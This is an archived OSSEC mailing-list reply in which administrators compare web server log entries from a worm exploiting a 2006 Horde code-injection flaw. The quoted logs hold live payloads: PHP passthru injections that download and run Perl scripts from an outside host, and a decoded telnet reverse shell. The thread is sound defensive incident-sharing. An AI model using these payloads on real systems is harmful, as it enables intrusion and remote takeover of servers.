[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[ossec-list] Re: Horde worm in the wild.

To: ossec-list@xxxxxxxxxxxxxxxx
Subject: [ossec-list] Re: Horde worm in the wild.
From: ahmet ozturk <oahmet@xxxxxxxxxxx>
Date: Fri, 23 Jun 2006 09:46:28 +0300
Cc: OSSEC Users List <ossec-list@xxxxxxxxx>

Hi Daniel,

Sorry for the late reply,
We have similar entries in our logs (there are not too much).


---
85.96.227.229 - - [13/Jun/2006:20:31:49 +0300] "GET 
/horde/services/help/?show=about&module=;\".passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(98).chr(101).chr(103).chr(95).chr(59).chr(108).chr(115).chr(32).chr(45).chr(97).chr(108).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(101).chr(110).chr(100).chr(95));'. 
HTTP/1.1" 302 568
85.96.227.229 - - [13/Jun/2006:20:49:11 +0300] "GET 
/horde/services/help/?show=about&module=;\".passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(98).chr(101).chr(103).chr(95).chr(59).chr(115).chr(108).chr(101).chr(101).chr(112).chr(32).chr(55).chr(50).chr(48).chr(48).chr(124).chr(116).chr(101).chr(108).chr(110).chr(101).chr(116).chr(32).chr(49).chr(48).chr(46).chr(48).chr(46).chr(48).chr(46).chr(55).chr(32).chr(52).chr(51).chr(50).chr(49).chr(124).chr(119).chr(104).chr(105).chr(108).chr(101).chr(32).chr(58).chr(32).chr(59).chr(32).chr(100).chr(111).chr(32).chr(115).chr(104).chr(32).chr(38).chr(38).chr(32).chr(98).chr(114).chr(101).chr(97).chr(107).chr(59).chr(32).chr(100).chr(111).chr(110).chr(101).chr(32).chr(50).chr(62).chr(38).chr(49).chr(124).chr(116).chr(101).chr(108).chr(110).chr(101).chr(116).chr(32).chr(49).chr(48).chr(46).chr(48).chr(46).chr(48).chr(46).chr(55).chr(32).chr(52).chr(51).chr(50).chr(49).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr
(109).chr(100).chr(95).chr(101).chr(110).chr(100).chr(95));'. 
HTTP/1.1" 302 1257
---

The first line is: passthru(echo _cmd_beg_;ls -al;echo _cmd_end_);
the second line is: passthru(echo _cmd_beg_;sleep 7200|telnet 10.0.0.7 4321|while : ;
do sh && break; done 2>&1|telnet 10.0.0.7 4321;echo _cmd_end_);

Regards,

Ahmet Ozturk.


Daniel Cid wrote:
> Is anyone noticing a new horde worm out there? It is related to the
> following vulnerability (http://www.horde.org):
> 
> "
> March 28th, 2006. The Horde Team has released a critical security fix
> for the Horde Application Framework versions 3.0 and above. Version
> 2.x and earlier releases are not affected. The fixed Horde versions
> 3.0.10 and 3.1.1 are available. We strongly encourage every user to
> update to the new versions immediately.
> 
> There are exploits in the wild for this vulnerability. They can only
> exploit the user the webserver runs as, but are still serious. Please
> upgrade now.
> "
> 
> I'm getting alerts from ossec for the following logs (yes, my horde is
> updated :)).
> Is anyone seeing that?
> 
> 
> 217.160.242.70 - - [20/Jun/2006:13:41:22 -0300] "GET
> /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
> HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40"
> 
> 204.14.90.21 - - [20/Jun/2006:19:00:34 -0300] "GET
> /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
> HTTP/1.0" 200 37974 "-" "lwp-trivial/1.41"
> 
> 204.14.90.21 - - [19/Jun/2006:03:07:23 -0300] "GET
> /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
> HTTP/1.0" 200 37917 "-" "lwp-trivial/1.41"
> 
> 69.16.208.123 - - [18/Jun/2006:11:15:13 -0300] "GET
> /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
> HTTP/1.0" 200 37926 "-" "lwp-trivial/1.41"
> 
> 
> Thanks,
> 
> --
> Daniel B. Cid
> dcid @ ( at ) ossec.net
> 
> 

--~--~---------~--~----~------------~-------~--~----~
-~----------~----~----~----~------~----~------~--~---

References:
- [ossec-list] Horde worm in the wild.
  - From: Daniel Cid

Prev by Date: [ossec-list] Re: OSSEC-CONTROL Segfault message
Next by Date: [ossec-list] small fix to InstallAgent.sh, InstallServer.sh
Previous by thread: [ossec-list] Horde worm in the wild.
Next by thread: [ossec-list] OSSEC ranked #2 on IDS tools and #56 on top security tools
Index(es):
- Date
- Thread

OSSEC home | Main Index | Thread Index

OSSEC project: www.ossec.net.
Mailling list information: http://www.ossec.net/en/mailing_lists.html.